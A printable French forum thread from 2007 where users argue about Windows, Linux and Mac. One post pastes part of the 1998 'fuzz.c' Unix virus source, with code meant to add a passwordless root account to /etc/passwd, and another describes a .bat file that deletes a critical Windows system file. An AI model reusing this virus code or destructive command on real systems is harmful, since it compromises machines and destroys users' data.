JeuWeb - Crée ton jeu par navigateur
[Troll] Windows, Linux et Mac OS X - Version imprimable

+- JeuWeb - Crée ton jeu par navigateur (https://jeuweb.org)
+-- Forum : Général (https://jeuweb.org/forumdisplay.php?fid=36)
+--- Forum : Blabla (https://jeuweb.org/forumdisplay.php?fid=42)
+--- Sujet : [Troll] Windows, Linux et Mac OS X (/showthread.php?tid=1908)

Pages : 1 2 3 4 5 6 7 8 9 10 11 12


RE: [troll] WIN LINUX MAC... - phenix - 21-10-2007

Tu me donne envie de continué :hahahaha:

Citation :Ce que je n'aime pas par contre, c'est cette hypocrisie autour de Linux.

En quoi il y a de l'hypocrisie autour de linux ? Tu parle des gens qui ce sente supérieur au autre parce qu'il utilise linux ? Si c'est le cas, laisse tombé il y a des con partout.

Citation :Rien que lire les forums sur le Site du Zéro ça me fout la rage tant certains font leurs pro-linux alors qu'ils se foutent pas mal du libre.

Tu fonde donc ton opinions, sur des forums surement remplit de boulet (puisque connut). Le monde du libre ce fiche pas mal d'eux aussi, il utilise du libre et le libre est contant, il a atteint son objectif !

Citation :Et le tutoriel du SdZ n'arrange pas les choses.

En quoi c'est mal de présenté un autre OS et de montré comment l'installer ? Combattre le monopole de microsoft en quoi est-ce une mauvaise chose ?

Phenix


RE: [troll] WIN LINUX MAC... - Sephi-Chan - 21-10-2007

Prends pas tout ce que je dis mal !

Je dis juste que les Kévins qui fréquentaient déjà le SdZ se sont jetés sur le tutoriel Linux et maintenant ils disent vivent Linux, vive le Libre alors qu'ils (certains) ont aucune réelle conviction pour cette cause. C'est ça l'hypocrisie façon Linux que j'accuse.

Et je juge pas tous les utilisateurs de Linux, juste une partie que j'ai pu apercevoir. À cause de ce tuto, le nombre de boulets utilisateurs de Linux a augmenté drastiquement. Alors forcément maintenant j'ai une appréhension quand je vois des Linuxiens.


Sephi-Chan


RE: [troll] WIN LINUX MAC... - phenix - 21-10-2007

Citation :Alors forcément maintenant j'ai une appréhension quand je vois des Linuxiens.

C'est débile, le foot est un sport célébre, du coup plein de kevin y vont, faut il avoir une appréhension ? A ce train la tu aura une appréhension sur tout, car kevin est partout !

Je me contente d'ignorer cette communauté, ou bien de l'utilisé...

Phenix


RE: [troll] WIN LINUX MAC... - lanoix - 21-10-2007

Moi je suis mac fanatique... Depuis que j'ai 2 ans sur mac (1985...). Ai toujours connu les 2 (3 après, avec linux) environnements, et ai tj vu lequel coutait réellement le moins cher, etait le plus propre et le moins chiant. Et quand j'ai voulu jouer, j'ai pris une console!

Pour répondre à "quand j'ai un problème, je reformatte, et je réinstalle"... Est-ce que tu te rends compte que ca reste encore une opération périlleuse pour une majorité d'utilisateurs? Qui préfère appeler "le fils du voisin" parce que pour eux c'est la galère? Le pire c'est que linux leur semble encore + galère alors que c'est une pure idée recue... Donnez leur un linux (ou un mac, mais ici ca part d'un matériel PC a la base) et ils comprendront que c'est devenu pousse-pousse-bouton...


RE: [troll] WIN LINUX MAC... - leni - 21-10-2007

pffff vous voulez vraiment que je vous dise ?
vive les logiciels libreeeeee !!!!!!!!!!!!
windows : 250 euro de license pour un truc qui plante tout le temp
mac : 3 logiciels pommés qui ramment a fond (je voudrai aps dire, mais mac met au moi 1min30 à s'allumer)
linux : KDE ou ubuntu (mandriva jamais tester) : moin de logiciel que sur win, mais tout les meilleurs editeur de textes, un logiciel qui permet 'installer les logiciels windows, et jamais un beg. surtout que c'est gratuit ^^
mon ordi c un p4 avec 512 de ramme. la, j'ai 2G de ramme !! (pour le processeur, a pa pu booster). j'arrive pas a comprendre seux quii n'essayent même pas Wink


RE: [troll] WIN LINUX MAC... - arcanis - 21-10-2007

Citation :C'est comment un virus ?
Ca ressemble un peu à ça, mais en beaucoup plus long (j'ai pas mis le main par manque de place):

Code :
/* [ http://www.rootshell.com/ ] */

/* The module infector for Linux kernels published recently on rootshell
inspired me to take a look at some old code, that was able to spawn
itself on a FreeBSD host and run arbitary commands as root as soon
as one infected file was run by root. This is more or less the same
principle like the "bliss" virus, however I never managed to get the
sources for that one. This virus is *really* simple, it searches for
files with write permission by brute force trying to infect files. It will
then infect the file with arbitary code and mark it as infected.
The default "malicious" action is to add a uid 0 user to /etc/passwd.
This source can be freely modified to do anything else. I figured out
that this could for example help someone keeping who rooted a box...
another use would be to put in something like in ADMw0rm - for example
a remote buffer overflow or a remote NFS scanner that scans for remote
holes when the virus is running and gives remote root to infect other
systems.

PATCH: chattr +i your executables maybe and NEVER EXECUTE
UNCHECKED BINARIES AS ROOT :)

Mixter

--- 8< --- cut --- 8< --- cut --- 8< --- */

/* fuzz.c - example of a Unix Virus
* written in July 1998 by Mixter <mixter@gmx.net>
* works on: Linux 1.x, Linux 2.x, FreeBSD 2.x
* possibly works on: Any BSD, SunOS, HPUX, IRIX
* parts of the source code copyright by "American Eagle Publications"
* this virus does NOT need root, but it would help a lot :) */

#include <stdio.h>
#include <sys/types.h>
#include <dirent.h>
#include <sys/stat.h>
DIR *dirp;                            /* directory search structure */
struct dirent *dp;                    /* directory entry record */
struct stat st;                       /* file status record */
int stst;                             /* status-call status */
FILE *host,*virus, *pwf;              /* host/virus/passwd file */
long FileID;                          /* 1st 4 bytes of host */
char buf[512];                        /* buffer for disk reads/writes */
char *lc,*ld;                         /* used to search for virus */
size_t amt_read,hst_size;             /* amount read from file, host size */
size_t vir_size=13264;                /* size of virus, in bytes */
char dirname[10];                     /* subdir where virus stores itself */
char hst[512];

/* line being added to /etc/passwd */
char mixter[]="mixter::0:0:root:/:/bin/sh";

void readline() {
  lc=&buf[1];
  buf[0]=0;
  while (*(lc-1)!=10) {
    fread(lc,1,1,pwf);
    lc++;
    }
  }

void writeline() {
  lc=&buf[1];
  while (*(lc-1)!=10) {
    fwrite(lc,1,1,host);
    lc++;
    }
  }
(oui, je remonte trois pages en arrière mais c'est votre faute, z'aviez qu'à m'attendre Tongue )


Linux semble être un truc sympathique, mais le fait qu'on ne puisse pas y utiliser de logiciel windaube sans utiliser en même temps "un-truc-qui-n'est-pas-un-émulateur-mais-qui-en-est-quand-même-un" me gène quand même un peu...
Si encore diablo II tournait dessus sans hack, je dirais pas, mais là...


RE: [troll] WIN LINUX MAC... - leni - 21-10-2007

a bon ? on 'mavais apris à en creer un, c'est beaucoup plus simple ^^
je vous explique, c'est en fait un tout petit code, que quand il s'executera, cassera tout votre system d'exploitation.
j'avais fait comme sa :
-on ouvre le bloc note
-on tape : DEL c:/WINDOWS/system32/un_fichier_très_important_pour_le_demarage_de_l'ordi après il a d'autres lettres que j'ai pas compris
-on engereigstre sous "nimportequoi.bat"
-sa modifier le type de fichier
-il te manque plus qu'un gros couillon pour l'executer ^^ c'est d'ailleur pour sa que que le tien, arcanis est plus complex, il doit surment s'execuuter tout seul.


RE: [troll] WIN LINUX MAC... - Shiwa - 21-10-2007

Concernant mac, je me contenterai de citer Jean-Claude Van Damme : "L'Apple c'est bon, il y a du pentium dedans". A part ça je ne connais pas grand chose à cet univers, si ce n'est qu'il n'y a pas assez de jeux vidéo dessus, les configs ne sont pas assez customisables, et faire un OS conçu pour ne tourner que sur un type de machine propriétaire... si mac avait supplanté le PC on aurait eu un monopole d'une autre ampleur que celle de Microsoft.
Voilà, c'était l'avis du gars qui ne connaît rien aux macs.

Concernant linux, j'ai été très agréablement surpris en découvrant ubuntu. Je l'aurais probablement gardé si je n'avais pas eu des difficultés à installer les drivers... pour accéder à internet (où parait-il, on trouve facilement tous les drivers linux qu'on veut et l'aide technique qui va avec). Je retenterai bien l'expérience à l'occasion.

Mais au final, je suis sous Vista depuis six mois, et je suis bien content. Je me moque pas mal qu'il soit gourmand en ressources, en m'installant à Toulouse l'an dernier je me suis acheté une config de gros boeuf (peut-être même plus chère qu'un mac :heuSmile. Le contrôle de compte utilisateur, très énervant quand on installe tous les programmes et pilotes la première fois, se fait discret le reste du temps. J'ai le choix des programmes (et notamment les jeux vidéo), l'OS tourne sans aucun problème et je peux faire mumuse avec les gadgets (aero, reconnaissance vocale...).
Bref, sous windows, je fais ce que je veux avec mon ordinateur.
Petite précision quand même : j'aime bien Vista parce que je l'ai eu gratuitement via mon école d'ingé (s'il m'avait fallu débourser je ne sais plus combien de centaines d'euros, je ne tiendrais peut-être pas le même discours :rollSmile

PS: jouer sur console c'est nul (sauf peut-être la wii).
La console est chère, les jeux sont chers, n'existent pas en version "budget", les doom-like à la manette c'est très moyen (assistance à la visée=beurk), ne parlons pas des jeux de stratégie.
J'ajouterai qu'il n'y a que sur PC qu'on peut profiter pleinement des plaisirs de l'abandonware et des jeux indépendants.


RE: [troll] WIN LINUX MAC... - Mysterarts - 21-10-2007

leni a écrit :mac : 3 logiciels pommés qui ramment a fond (je voudrai aps dire, mais mac met au moi 1min30 à s'allumer)

"Pommé" ? Un jeu de mot ? Mouahah ! Rien que ma bibliothèque d'application payante est rempli de 7547, et elle n'est pas complète, et évidement, il existe des milliers de logiciel libre ! Bien sur, il y en a moins que sur PC, mais franchement, pensez vous qu'il en faille autant ? Depuis que je suis sous mac, le SEUL logiciel qui m'a obligé à revenir sous windows, CT un logiciel de mix pro. Et pourtant je suis un touche à tout, donc G pleins de logiciel de tous genre !
Je voulais dire par là, que le stéréotype : mac = pas de logiciel est révolu !
Quand au fait qu'il rame, et bah bon sang, je sais pas e qu'il te faut, mais mon macbook, qui a 8 mois et plus de place sur son Disque dur mais 30 secondes pour s'allumer... D'ailleurs, avec une config légèrement supérieur, mon pote sur son PC portable DOUBLE le temps de lancement (on a fait le test pour rigoler)...
Petite vidéo dans lequel on voit bien les moins de 30 seconde de démarrage, puis la vitesse de lancement d'au moins une dizaine d'application mutli fenêtre : http://www.youtube.com/watch?v=BxdK-bZQ698&mode=related&search= (et en bonus le superbe système de switch entre les fenêtres, ultra pratique)

Vite fait, pour le prix : oui, un mac, c'est cher, surtout comparé à un PC sous linux... Mais parfois, on se permet de mettre un peu plus d'argent pour les petits détails Apple. Tant que vous avez pas eu un mac, vous pouvez pas vous rendre compte, c'est pourquoi je ne m'étendrai pas la dessus...

Shiwa a écrit :Concernant mac, je me contenterai de citer Jean-Claude Van Damme : "L'Apple c'est bon, il y a du pentium dedans". A part ça je ne connais pas grand chose à cet univers, si ce n'est qu'il n'y a pas assez de jeux vidéo dessus, les configs ne sont pas assez customisables, et faire un OS conçu pour ne tourner que sur un type de machine propriétaire... si mac avait supplanté le PC on aurait eu un monopole d'une autre ampleur que celle de Microsoft.
Voilà, c'était l'avis du gars qui ne connaît rien aux macs.
Sur ça, je pense que tu as un peu près raison Smile Seulement c'est justement parce qu'il n'ont pas le monopole que l'ordre des choses et ainsi, il me semble.


Mysterarts, qui encore une fois, pense que chaque OS à son public, point.


RE: [troll] WIN LINUX MAC... - Shiwa - 21-10-2007

Le but de ce troll n'est pas d'arriver à la conclusion (logique) que chaque OS a son public, mais de déterminer lequel a le public le plus fanatique Smile